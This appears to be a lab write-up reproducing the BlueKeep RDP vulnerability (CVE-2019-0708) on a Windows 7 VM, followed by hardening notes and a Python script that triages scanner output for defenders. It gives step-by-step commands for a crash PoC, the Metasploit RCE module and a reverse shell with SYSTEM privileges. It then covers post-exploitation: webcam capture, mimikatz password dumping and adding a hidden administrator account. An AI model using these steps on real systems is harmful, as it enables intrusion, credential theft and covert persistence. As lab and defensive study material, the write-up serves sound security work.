
Vulnerability Reproduction: "CVE_2019_0708 BlueKeep"

Environment

  • Windows7 ultimate sp1 x64
  • MSF

Enable Remote Desktop:

[screenshot: Remote Desktop settings]

Disable the firewall:

[screenshot: Windows Firewall settings]

Exploitation

Early blue screen (BSOD)

This is the early exploit PoC!

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32  #python3 crashpoc.py <ip address> <system type>


Note: the PoC above works against Win7 without the firewall being disabled.

Getting a shell

Download the attack scripts:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Import the attack scripts:

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Vulnerability detection:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run

[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploitation:

reload_all   #load the attack scripts
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.130
set rport 3389
set target 3    #because we are using VMware, we can use target 3
exploit

[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800

session 1
session 1
'session' 不是内部或外部命令，也不是可运行的程序或批处理文件。

C:\Windows\system32>whoami
whoami
nt authority\system
#Successfully obtained a shell, running with SYSTEM privileges
#The first exploit attempt blue-screened Win7; the shell was obtained normally afterwards

Explanation of the target values (the module indexes them from 0, which is why target 3 above selects VMware):

  1. Automatic detection via fingerprinting
  2. Physical machine
  3. VirtualBox virtual machine
  4. VMware virtual machine

Privilege Escalation

meterpreter > getuid         #get the current uid
meterpreter > screenshot     #take a screenshot
meterpreter > webcam_snap    #capture a webcam image
meterpreter > load mimikatz  #load mimikatz to recover system passwords
meterpreter > wdigest        #dump system passwords
rdesktop 192.168.173.138     #log in via Remote Desktop

net user root$ root /add
net localgroup administrators root$ /add

The test machine in this experiment was Win7; on Windows Server 2008 the registry must be modified first, otherwise the target blue-screens.

Set the value of [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam] to 0

Hardening

Affected versions

Windows Server 2008 (R2)

Windows 7 SP1

Windows Server 2003

Windows XP

Temporary hardening

  • Block the remote port 3389
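The scanner output shown in the detection step, together with the affected-version list above, is enough to build a patch/block triage list for a defender. The following Python script is an added example; it is not part of the original post and not code from Metasploit. It parses the "Detected RDP on ..." and "The target is vulnerable." lines of the cve_2019_0708_bluekeep scanner as printed above, maps the reported build number to the affected products, and ranks each host: confirmed-vulnerable hosts first, then affected builds reachable without NLA, then affected builds behind NLA. The build-to-product mapping and the sample hosts other than 192.168.173.136 are my assumptions (the sample is constructed).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Build numbers as printed by the scanner, mapped to the products on the page's
# affected-version list. This mapping is an assumption of this example, not scanner output.
AFFECTED_BUILDS = {
    "6.1.7601": "Windows 7 SP1 / Windows Server 2008 R2 SP1",
    "6.1.7600": "Windows 7 / Windows Server 2008 R2",
    "6.0.6002": "Windows Server 2008 SP2",
    "6.0.6001": "Windows Server 2008 SP1",
    "5.2.3790": "Windows Server 2003",
    "5.1.2600": "Windows XP",
}

# Patterns for the two scanner lines we care about (format taken from the output above).
DETECT_RE = re.compile(
    r"Detected RDP on (?P<host>[\d.]+):(?P<port>\d+)\s+"
    r"\(Windows version: (?P<version>[\d.]+)\)\s+"
    r"\(Requires NLA: (?P<nla>Yes|No)\)"
)
VULN_RE = re.compile(r"\[\+\] (?P<host>[\d.]+):(?P<port>\d+)\s+- The target is vulnerable\.")


@dataclass
class RdpHost:
    host: str
    port: int
    version: str = ""
    requires_nla: bool = False
    confirmed_vulnerable: bool = False


def parse_scanner_output(text: str) -> Dict[str, RdpHost]:
    """Collect one RdpHost record per host:port from the scanner's output lines."""
    hosts: Dict[str, RdpHost] = {}
    for line in text.splitlines():
        m = DETECT_RE.search(line)
        if m:
            key = f"{m['host']}:{m['port']}"
            rec = hosts.setdefault(key, RdpHost(m["host"], int(m["port"])))
            rec.version = m["version"]
            rec.requires_nla = m["nla"] == "Yes"
            continue
        m = VULN_RE.search(line)
        if m:
            key = f"{m['host']}:{m['port']}"
            rec = hosts.setdefault(key, RdpHost(m["host"], int(m["port"])))
            rec.confirmed_vulnerable = True
    return hosts


def triage(rec: RdpHost) -> Tuple[str, str]:
    """Return (priority, recommended action) for one host."""
    product = AFFECTED_BUILDS.get(rec.version)
    if rec.confirmed_vulnerable:
        return ("CRITICAL", f"{product or rec.version}: unpatched; block TCP/{rec.port} "
                            "at the firewall and apply the patch or hotpatch")
    if product and not rec.requires_nla:
        return ("HIGH", f"{product}: affected build reachable without NLA; "
                        "verify patch level and enable NLA")
    if product:
        return ("MEDIUM", f"{product}: affected build, NLA required "
                          "(reduces unauthenticated exposure); still patch")
    return ("INFO", f"build {rec.version} is not on the affected list")


def triage_report(text: str) -> List[Tuple[str, str, str]]:
    """Triage every host in the scanner output, highest priority first."""
    order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "INFO": 3}
    rows = [(key, *triage(rec)) for key, rec in parse_scanner_output(text).items()]
    return sorted(rows, key=lambda r: order[r[1]])


# Constructed sample: the page's own scanner lines for .136 plus two made-up hosts.
SAMPLE_OUTPUT = """\
[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 10.0.0.5:3389  - Detected RDP on 10.0.0.5:3389  (Windows version: 6.1.7601) (Requires NLA: Yes)
[*] 10.0.0.9:3389  - Detected RDP on 10.0.0.9:3389  (Windows version: 10.0.17763) (Requires NLA: Yes)
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
"""

if __name__ == "__main__":
    for key, prio, action in triage_report(SAMPLE_OUTPUT):
        print(f"{prio:8} {key:22} {action}")
```

Feed it the saved console output of a scanner run (`msfconsole` with `spool` enabled, or a copied transcript); hosts that come out CRITICAL are the ones the "block port 3389" and hotpatch steps below should be applied to first, and HIGH hosts are where enabling NLA buys time until the patch is installed.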

Hotpatch

Reference: QiAnXin (奇安信) CVE-2019-0708 hotpatch tool user manual

Original article by 小嵘源码; if reposting, please credit the source: https://www.lcpttec.com/bluekeep/
